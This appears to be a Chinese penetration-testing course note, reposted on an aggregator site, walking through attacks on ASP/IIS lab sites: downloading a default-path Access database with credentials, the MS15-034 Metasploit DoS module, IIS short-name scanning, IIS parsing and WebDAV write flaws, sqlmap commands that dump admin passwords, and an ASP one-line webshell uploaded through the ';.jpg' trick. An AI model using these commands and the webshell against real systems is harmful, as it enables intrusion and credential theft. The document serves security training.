041-WEB攻防-ASP应用HTTP.SYS短文件文件解析Access注入数据库泄漏

041-WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏

Untitled

#知识点:

1、ASP-SQL注入-Access数据库
2、ASP-默认安装-数据库泄漏下载
3、ASP-IIS-CVE&短文件&解析&写入

演示案例:

➢ASP-默认安装-MDB数据库泄漏下载
➢ASP-中间件-CVE&短文件&解析&写权限
➢ASP-SQL注入-SQLMAP使用&ACCESS注入

#ASP-默认安装-MDB数据库泄漏下载

  • 由于大部分ASP程序与ACCESS数据库搭建,但ACCESS无需连接
  • 在==脚本文件中定义配置好数据库路径即用不需要额外配置安装数据库==
  • 提前固定好的数据库路径如默认未修改
  • 当攻击者知道数据库的完整路径,可远程下载后解密数据实现攻击。

1,打开虚拟机环境2003 企业版 32位 IIS 6.0 CN

2,右键我的电脑打开管理,选择Internet信息服务(IIS)→网站

3,选择对应的fyblogs_3.0 网站,查看分配的ip地址

4,通过其他主机访问该IP地址

5,成功访问后,通过访问对应下载路径,直接下载`#data.mdb文件

http://192.168.200.140:81**/database/%23data.mdb**

6,打开文件,发现其中==泄露用户名密码==等信息

Untitled

Untitled

Untitled

遇到问题:打开网址不能在正常打开

Untitled

解决:将属性中的ip地址重新分配即可

Untitled

Untitled

#ASP-中间件-CVE&短文件&解析&写权限

Untitled

HTTP.SYS(CVE-2015-1635)

1、漏洞描述

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

2、影响版本

Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

3、漏洞利用条件

安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本

4、漏洞复现
  • msfconsole

    是==Metasploit Framework的命令行界面==,它是一个功能强大的渗透测试工具和漏洞利用框架。Metasploit Framework旨在帮助安全专业人员评估和测试计算机系统的安全性,包括发现漏洞、开发和执行攻击、获取远程访问权限等。

  • use auxiliary/dos/http/ms15_034_ulonglongadd

    是Metasploit Framework中的一个辅助模块,用于执行针对MS15-034漏洞(也称为HTTP.sys远程代码执行漏洞)的拒绝服务(DoS)攻击。这个漏洞影响Windows操作系统中的HTTP堆栈,攻击者可以通过发送特制的HTTP请求导致**目标系统崩溃,从而实现拒绝服务攻击。**

  • set rhosts xx.xx.xx.xx
    set rport xx
    run

Untitled

Untitled

Untitled

IIS短文件

1、漏洞描述

此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息

Untitled

2、漏洞成因:

为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用命令**dir /x**

Untitled

3、应用场景:

后台路径获取,数据库文件获取,其他敏感文件获取等

python iis_shortname_scan.py [http://192.168.200.140:88/](http://192.168.200.140:88/)

  • 选择对应的powereasy 网站,查看分配的ip地址
  • 借助工具,输入执行语句和目标ip执行扫描
  • 获取到对应的网站目录

Untitled

Untitled

Untitled

4、利用工具:

https://github.com/lijiejie/IIS_shortname_Scanner

IIS文件解析

  • IIS 6 解析漏洞→可以上传木马文件,以图片形式或文件夹形式替换格式

    • 1、该版本默认会将***.asp;.jpg** 此种格式的文件名,当成Asp解析

      Untitled

      Untitled

    Untitled

    • 2、该版本默认会将***.asp/目录下的所有文件当成Asp解析**。
      如:logo.asp;.jpg xx.asp/logo.jpg

      Untitled

    Untitled

    Untitled

  • IIS 7.x 解析漏洞

    • 在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
      应用场景:配合文件上传获取Webshell

IIS写权限

  • IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许
  • 可以通过提交put包,进行写入文件(可置入木马,获得权限)
    参考利用:https://cloud.tencent.com/developer/article/2050105

Untitled

Untitled

Untitled

Untitled

Untitled

#ASP-SQL注入-SQLMAP使用&ACCESS注入

  1. ACCESS数据库无管理帐号密码,顶级架构为表名,列名(字段),数据
  2. 所以在注入猜解中一般采用字典猜解表和列再获取数据,猜解简单但又可能出现猜解不到的情况
  3. Access数据库在当前安全发展中已很少存在,故直接使用SQLMAP注入,后续再说其他。

Untitled

1.打开对应的UploadParsing网址,并使用其分配的IP进行访问

Untitled

2.源码中,没有进行sql语句的过滤直接拼接,造成有注入风险

  • http://192.168.200.140:89**/Pic.asp?classid=3**

    Untitled

3.使用sqlmap工具进行sql注入

  • G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐狸\gui_scan\sqlmap

  • python sqlmap.py -u “” --tables //获取表名
    python sqlmap.py -u “” --cloumns -T admin //获取admin表名下的列名
    python sqlmap.py -u “” --dump -C “username,password” -T admin //获取表名下的列名数据

  • python .\sqlmap.py -u “http://192.168.200.140:89/Pic.asp?classid=3” --tables

    • python .\\sqlmap.py: 启动 SQLMap 工具,使用 Python 解释器运行。

    • u "<http://192.168.200.140:89/Pic.asp?classid=3>": 指定目标 URL,即要测试的网站地址。在这个例子中,目标 URL 是 http://192.168.200.140:89/Pic.asp?classid=3u 选项用于指定 URL。

    • -tables: 指定 SQLMap 工具执行的任务,这里是获取数据库中的所有表。-tables 选项用于请求表的信息。

    • 提示有注入点

      Untitled

  • 它询问是否要使用常见的表存在性检查方法

    • do you want to use common table existence check? [Y/n/q] y

    • 选择要使用的常见表文件的提示。用户可以选择默认的常见表文件,也可以选择自定义的常见表文件。

    • 询问用户要设置多少个线程进行测试

    • please enter number of threads? [Enter for 1 (current)] 输入10

      Untitled

Untitled

Untitled

  • python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --columns -T admin

    • -columns: 这是 SQLMap 的一个选项,用于指示工具查找指定表的列。

    • T admin: 这是 SQLMap 的另一个选项,用于指定目标表的名称。在这里,它是 “admin” 表。

      Untitled

      Untitled

  • python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --dump -C “username,password” -T admin

    • -dump: 这是 SQLMap 的选项,用于指示工具从数据库中检索数据。

    • C "username,password": 这是 SQLMap 的选项,用于指定要检索的列的名称。在这里,它是 “username” 和 “password” 列。

    • 得出如下的用户名和密码

      Untitled

  • 由于密码是MD5加密的

    使用解密解密出密码

    Untitled

    Untitled

4.使用IIS短目录或**目录扫描(7kbscan御剑版)**扫描找到后台登录页面

Untitled

  • python iis_shortname_scan.py http://192.168.200.140:89/

    • 扫描出一些目录

    • 一一进行访问在访问时发现:http://192.168.200.140:89/upfile.asp

    • 会跳转到后台登录页面:http://192.168.200.140:89**/Tcnet/Admin_Login.asp**

      Untitled

      Untitled

      Untitled

  • 目录扫描(7kbscan御剑版)

    • 直接将目标地址写入

    • 选择对应的字典类型和显示结果

    • 发现有跳转的页面直接访问至后台

      Untitled

      Untitled

  • 网站爬虫

    • 直接在网址检测中点击文件,查看目录和文件结构
    • 直接查看网站前端源码

Untitled

Untitled

Untitled

5.登录后台页面

Untitled

6.模拟漏洞上传测试(只需要了解后面还会讲)

  • 分别开启burp和浏览器的代理和端口

    Untitled

    Untitled

  • 上传普通的小的照片

    Untitled

    Untitled

    Untitled

    Untitled

  • 进行抓包,将包中的有关文件路径的内容,拼接上去**/1.asp;.(可以将木马文件,替换为该格式)**

  • 再次抓包

    Untitled

    Untitled

    Untitled

  • 将照片路径替换为:192.168.126.131:89**/1.asp;.20235192154599715.png**

    • 发现可以被当成Asp正常解析

    • 在抓包的后面加上木马程序的内容**<%eval request(”passs”)%>**

      1. <%%>: 这是ASP脚本中的定界符,用于标识服务器端代码的开始和结束。
      2. eval: 这是一个函数或操作符,用于执行动态生成的代码。在这里,它被用于执行后面括号中的内容。
      3. request("passs"): 这部分看起来是从请求中获取名为 “passs” 的参数的值。request 是用于获取请求参数的对象,而 “passs” 是参数的名称。

      总体来说,这段代码的作用是从请求中获取名为 “passs” 的参数的值,并使用 eval 函数执行它。这种构造可能导致安全风险,特别是如果用户能够控制传递给 “passs” 参数的内容。eval 的使用通常被认为是不安全的,因为它允许执行任意的动态代码,可能导致代码注入攻击。

    • 使用哥斯拉,利用木马文件获得权限成功

      Untitled

      Untitled

      Untitled

      Untitled

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/693254.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何压缩pdf文件大小?3个有效的解决方法分享

如何压缩pdf文件大小&#xff1f;在办公中&#xff0c;PDF文件大小的压缩不仅有助于节省存储空间&#xff0c;使得大量的PDF文件可以更为高效地存储在有限的硬盘或云端空间中&#xff0c;还能显著加快文件在网络中的传输速度&#xff0c;特别是在处理大型或批量PDF文件时&#…

EXCEL使用VBA一键批量转换成PDF

EXCEL使用VBA一键批量转换成PDF 上图是给定转换路径 Sub 按钮1_Click() Dim a(1 To 1000) As String Dim a2 As String Dim myfile As String Dim wb As Workbook a2 Trim(Range("a2"))myfile Dir(a2 & "\" & "*.xls")k 0Do While m…

springcloud-网关(gateway)

springcloud-网关(gateway) 概述 \Spring Cloud Gateway旨在提供一种简单而有效的方式来路由到API&#xff0c;并为其提供跨领域的关注&#xff0c;如&#xff1a;安全、监控/指标和容错 常用术语 Route&#xff08;路由&#xff09;: 网关的基本构件。它由一个ID、一个目的地…

Lightfm学习记录

推荐参考资料 官方文档仓库地址论文地址LightFM推荐系统框架学习笔记LightFM推荐模型库(利于入门)how-i-would-explain-building-lightfm-hybrid-recommenders-to-a-5-year-old(用处不大)协同推荐 lightfm 根据用户已读诗词推荐(可能有用)Recommendation System in Python: L…

C#开发AGV地图编辑软件

C#自己开发AGV地图编辑软件&#xff1a; 1、自由添加和删除站点、停车位、小车、运行路径。 2、编辑得地图以XML文件保存。 3、导入编辑好地图的XML文件。 4、程序都是源码&#xff0c;可以直接在此基础上进行二次开发。 下载链接&#xff1a;https://download.csdn.net/d…

隐匿的炸弹 — C语言的隐式声明

前言 &#xff08;1&#xff09;如果有嵌入式企业需要招聘湖南区域日常实习生&#xff0c;任何区域的暑假Linux驱动实习岗位&#xff0c;可C站直接私聊&#xff0c;或者邮件&#xff1a;zhangyixu02gmail.com&#xff0c;此消息至2025年1月1日前均有效 &#xff08;2&#xff0…

【Python】OpenCV-图像轮廓检测初学

图像轮廓检测初学 在图像处理领域中&#xff0c;轮廓检测是一项重要的任务&#xff0c;用于寻找并标定图像中的物体边缘。本文将介绍如何使用OpenCV库进行图像轮廓检测&#xff0c;并展示一个简单的示例代码。代码中的注释将详细解释每一步的操作。 1. 引言 图像轮廓检测是图…

基于PSO优化的CNN多输入时序回归预测(Matlab)粒子群算法优化卷积神经网络时序回归预测

目录 一、程序及算法内容介绍&#xff1a; 基本内容&#xff1a; 亮点与优势&#xff1a; 二、实际运行效果&#xff1a; 三、部分代码&#xff1a; 四、完整程序下载&#xff1a; 一、程序及算法内容介绍&#xff1a; 基本内容&#xff1a; 本代码基于Matlab平台编译&…

PHP分析二维数据表(长度|数字字段|空值|纯姓名|英文用户名|科学计数|是否等长|是否唯一)

先看图&#xff0c;后有完整代码 <?php $t "Excel数据转Sql查询系统字段半智能分析"; $s "Excel复制过来的二维结构表内容,分析查询条件&#xff01;"; $x "字段|最大长度|长度有|数字字段|空值存在|纯姓名|英文用户名|科学计数|是否等长|是否…

无痛法门,助力学习

**注&#xff1a;**本文摘自一位网友“我就是贺生啊”&#xff0c;博主觉得很有道理&#xff0c;便想记录下来分享给大家。仅个人想法&#xff0c;谨慎参考&#xff0c;也欢迎大家说出自己的想法。 引言 在我们学习新知识的时候&#xff0c;会觉得很痛苦&#xff0c;制定学习…

【git】提交信息写错了,使用 amend 或者 reset 修改最近一次的提交信息 ,修改上上次/以前的提交信息

如果你的提交信息写错了&#xff0c;比如下面&#xff0c;你想修改【初始化项目】这5个字 修改最近一次的提交新的两个办法 &#xff08;1&#xff09;使用 reset 把这个提交重置&#xff0c;然后重新提交&#xff0c;reset 的使用方法请参考这篇文章。但是 reset 这种方法只能…

Django学习笔记-HTML实现MySQL的图片上传

1.django项目编写index.html代码 创建form表单,路由指向upload,请求方式post,enctype设置"multipart/form-data", post请求添加{% csrf_token %},编写两个input,上传和提交 2.添加upload路由 3.views中创建upload 1).获取上传的文件,没有上传则返回"没有指定…

2024年度最高人气的编程语言

本期共享的是 —— 年度地球人气最高的编程语言。 根据我们对人力资源专家和开发者的年度调查&#xff0c;目前市场需求量最大的 10 种编程技术是&#xff1a; Python&#xff08;42.1% 的受访者对具备该技能的候选人有大量需求&#xff09;JS&#xff08;41.6%&#xff09;Ja…

IMX6ULL裸机之UART串口通信(中断)

由于正点原子的UART串口通信裸机例程&#xff0c;采用的是查询方式来进行串口通信&#xff0c;并未使用中断&#xff0c;导致CPU利用率较低&#xff0c;于是产生做本实验的动力。 查阅资料 通过《IMX6ULL参考手册》&#xff0c;得知其串口中断有 从55.4.5 Receiver中可以看出…

解决pycharm中PIL安装失败

问题&#xff1a;在调用pil时显示pil标红 我在设置中下载每次失败&#xff0c;显示 ERROR: Could not find a version that satisfies the requirement PIL (from versions: none) ERROR: No matching distribution found for PIL我尝试了很久&#xff0c;查看了一些博客 &a…

【笔记】【开发方案】APN 配置参数 bitmask 数据转换(Android KaiOS)

一、参数说明 &#xff08;一&#xff09;APN配置结构对比 平台AndroidKaiOS文件类型xmljson结构每个<apn>标签是一条APN&#xff0c;包含完成的信息层级数组结构&#xff0c;使用JSON格式的数据。最外层是mcc&#xff0c;其次mnc&#xff0c;最后APN用数组形式配置&am…

Java使用企业邮箱发送预警邮件

前言&#xff1a;最近接到一个需求&#xff0c;需要根据所监控设备的信息&#xff0c;在出现问题时发送企业微信进行预警。 POM依赖 <!-- 邮件 --> <dependency><groupId>com.sun.mail</groupId><artifactId>jakarta.mail</artifactId>…

【C++】C++11下线程库

C11下线程库 1. thread类的简单介绍2.线程函数参数3.原子性操作库(atomic)4.mutex的种类5. RAII风格加锁解锁5.1Lock_guard5.2unique_lock 6.condition_variable 1. thread类的简单介绍 在C11之前&#xff0c;涉及到多线程问题&#xff0c;都是和平台相关的&#xff0c;比如wi…

Android | ArcGIS入门

一、概述 ArcGIS是由Esri开发的地理信息系统&#xff08;GIS&#xff09;软件。它用于制图、空间分析和数据可视化。ArcGIS允许用户以各种格式创建、管理、分析和共享地理信息。它通常用于城市规划、环境管理和应急响应等领域。该软件包括一系列工具&#xff0c;用于创建地图、…

新年新方案,制造业数字化经营管理平台方案全新升级

伴随着工业4.0和中国智造2025成为制造业领域的两大重要趋势&#xff0c;“推动制造业智能化改造数字化转型”已经到了“不得不”的阶段。 数字化转型能够为制造企业带来降本增效、扩能提质、优化流程、提升竞争力等优势&#xff0c;是建设现代化产业体系的必经之路。 然而&…